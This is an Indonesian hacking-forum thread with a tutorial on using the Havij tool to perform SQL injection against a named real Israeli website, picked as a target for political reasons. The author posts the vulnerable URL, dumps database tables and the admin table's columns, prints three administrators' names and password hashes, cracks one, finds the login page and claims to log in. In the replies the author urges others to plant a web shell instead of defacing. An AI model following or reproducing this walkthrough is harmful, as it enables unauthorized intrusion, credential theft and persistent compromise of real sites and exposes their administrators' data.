Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[Tutorial] SQL Injection menggunakan Havij Vers 1.10

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

[Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby poni » Fri Jun 04, 2010 10:46 pm

Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini (Hey r3dm0v3.. u coded an awesome tool)
Code: Select all
http://forum.xcode.or.id/viewtopic.php?f=100&t=39403


Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website milik Israel.. (hmmm.... kenapa salah satu website di negara anda dijadikan kelinci disini sangat berkaitan erat dengan agresi militer anda pada kapal relawan dunia untuk Palestina.. saya non muslim tapi arogansi Israel adalah buntut dari tutorial ini).

web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ' pada web tsb:
Code: Select all
http://www.xenia.co.il/index.php?page_id='93

hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection

Image

Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)....

Image
hasilnya:

Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia

w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables

Image
w007s..... I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1


Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.

Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).

Image
w007ss.... cool.. got to check it out... saya dapatkan kolom sbb

regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1


nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :

name
email
pass

(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).

lalu klik Get Data dan

Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: [email protected]
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: [email protected]
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: [email protected]
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff

w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..

Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya

Image
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.

Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start.... .... ............. Searching

Image
Got that....
Page Found: http://www.xenia.co.il/login.php

Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access
Image
UH,,,, bahasanya sama sekali ga bisa dimengerti... :circle:
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby 3xtr3m3b0y » Fri Jun 04, 2010 11:11 pm

Nice job Om Master... :love:
Sy baru sadar akan ketangguhan HAVIJ... :love:

Thank U so much Master r3dm0v3
...n0 l1m17...
User avatar
3xtr3m3b0y
 
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby poni » Fri Jun 04, 2010 11:17 pm

hehehe.... kita hanya script kiddie... pengguna tool aja.. hahahaha :mati:
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby kitez » Fri Jun 04, 2010 11:35 pm

nice tutorial.... nyoba ah :devil
kitez
 
Posts: 5
Joined: Sat Dec 27, 2008 2:46 pm

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby sinichi » Fri Jun 04, 2010 11:41 pm

om poni mang mang ga da matinya
gw yg ucup ni cuma bisa sedot toolnya..

good job brother..
Just Newbie
Image
User avatar
sinichi
 
Posts: 52
Joined: Thu Nov 15, 2007 7:01 pm
Location: semarang

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby demonbrando » Sat Jun 05, 2010 12:53 am

aiiiihh............mantap dah om poni mah keren dah sukses selalu master... :tapa: :tapa:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby shinichi81 » Sat Jun 05, 2010 12:54 am

thanks master wat tutornya :love: :love: :love: :love:
............make a wish............
User avatar
shinichi81
 
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby poni » Sat Jun 05, 2010 7:33 am

Selamat belajar.uda ada yg berhasil belum?klo uda dpt akses ,jgn di deface ya.tanam shell aja.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby rieysha » Sat Jun 05, 2010 8:31 am

ijin belajar dari para master :tapa:
rieysha
 
Posts: 8
Joined: Thu Nov 08, 2007 10:00 am
Location: YOGYAKARTA

Re: [Tutorial] SQL Injection menggunakan Havij Vers 1.10

Postby adhie70 » Sat Jun 05, 2010 2:28 pm

ok sep.. cara deface yg singkat :malumalu:
a newie who want to learn
adhie70
 
Posts: 82
Joined: Sat Dec 12, 2009 10:58 am
Location: localhost

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: Yahoo [Bot] and 19 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id